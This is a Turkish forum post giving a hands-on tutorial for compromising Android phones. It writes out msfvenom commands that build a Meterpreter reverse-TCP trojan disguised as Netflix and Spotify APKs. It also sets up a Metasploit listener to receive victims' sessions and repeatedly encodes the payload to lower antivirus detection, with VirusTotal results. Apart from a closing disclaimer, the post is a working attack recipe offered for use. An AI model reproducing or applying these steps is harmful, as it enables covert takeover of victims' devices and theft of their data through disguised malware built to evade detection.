"Vatanını en çok seven, görevini en iyi yapandır."


Hoş Geldin, Ziyaretçi!

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı yada giriş yapmalısınız. Forum üye olmak tamamen ücretsizdir.

  • Yeni üyeler Neler Yapmalı, Nasıl Başlamalı? Detaylar için tıklayın
    Rütbeler ve genel görevlendirme konuları hakkında bilgi almak için tıklayın
    Uzmanlık alanları hakkında bildirge için tıklayın
    Güncel forum kuralları için tıklayın

Android Android Hackleme+Encode

FeLiXX

Yarbay
Katılım
9 Mar 2021
Mesajlar
982
Görev/Org:
lojistik
MERHABALAR TURKZ TAKİPÇİLERİ BU KONUMDA ANDROID HACKLEME+ENCODE'ı ANLATACAĞIM.
FAZLA UZATMADAN KONUYA GEÇEYİM.

ANDROID NEDIR?
Android; Google ve Open Handset Alliance tarafından, mobil cihazlar için geliştirilmekte olan, Linux tabanlı özgür ve ücretsiz bir işletim sistemidir. Sistem açık kaynak kodlu olsa da, kodlarının ufak ama çok önemli bir kısmı Google tarafından kapalı tutulmaktadır.

NEDEN ANDROID'I HACKLEMEK ISTERIZ?
Çünkü mobil platformda 2 büyük dev var IOS ve Android'dir.Oran %50'e denk geliyor karşımızdaki kişinin android kullanma olasılığı çok yüksektir.Ve android genç kitle tarafından çokça kullanılmaktadır.


HACKLEME AŞAMALARı:
Işin en eğlenceli bölümü başlıyor!!!!
1-
Ilk önce msfvenom'dan normal bir reverse_tcp trojanı oluşturalım
Msfvenom yazarak parametleri görüntüleyebilirsiniz
msfvenom.png
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP'INIZ LPORT=PORT -o netflix.apk
andr1.png
Virüsümüz geldi
Şimdi msfconsole'den modülümüzü seçelim
Gerekli ayarları yapalım;
1-
use exploit/multi/handler
2-set PAYLOAD android/meterpreter/reverse_tcp
3-set LPORT PORT NO
4-set LHOST IPNIZ
Ayarları yaptıktan sonra exploit yazıp dinlemeye başlayabilirsiniz.Size meterpreter'i gösteremeyeceğim ama help yazınca tüm komutlar çıkacaktır
exploit yazdıktan sonra karşı taraf trojanı açınca size session'u açacaktır
msff.png
Trojanı virüstotal'e koyalım bakalım
Tarama başladı
andr2.png

Herhangi bi encode durumu olmadı 63/28 gayet iyi bi değer aslında encodesiz
Bu biraz ürpertici:/
Şimdi encode edip taratalım
NASıL ENCODE EDILIR?
Işlem çok kolay aslında parametre ve encode türünü seçiyoruz ve işlem tamam.
-e ile encode tekniği veriyoruz -i ile kaç defa encode edileceğini belirtiyoruz -i ne kadar yüksek olursa okadar iyi ama bekleme süreside bi okadar artacaktır
Encode tekniklerini görmek için:
msfvenom --list encoders kodunu kullanıyoruz
Rank=Sıralama
Descripition=Açıklama
Name=Ismi
listencode.png
DENEYELIM
Bitane encode tekniği seçelim x86/shikata_ga_nai olsun
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP'INIZ LPORT=PORT -e x86/shikata_ga_nai -i 15 -o spotifyy.apk
andrencode.png
Evet encode edildi şimdi bunun virüstotal sonucuna bakalım
vtt.png
Gayet iyi bir sonuç 28'den 9'a düştü.Aynı teknik kalsın sayıyı artıralım değişikliği gözlemleyelim.
Önceden 15'ti şimdi 93 yaptım sonuca bakalım
encoo.png
Virüs geldi
Sonuç:
vttt.png

Sonuçta bi değişiklik olmadı demekki shikata encode ölmüş:(

Siz daha farklı encode teknikleri uygulayabilirsiniz sayıları değiştirip
Burdaki amaç bilgi vermektir herhangi bir sorumluluk kabul etmiyorum
UMARIM AÇIKLAYICI OLMUŞUMDUR.
HERKESE İYİ GÜNLER DİLERİM...
 
Son düzenleme:
Üst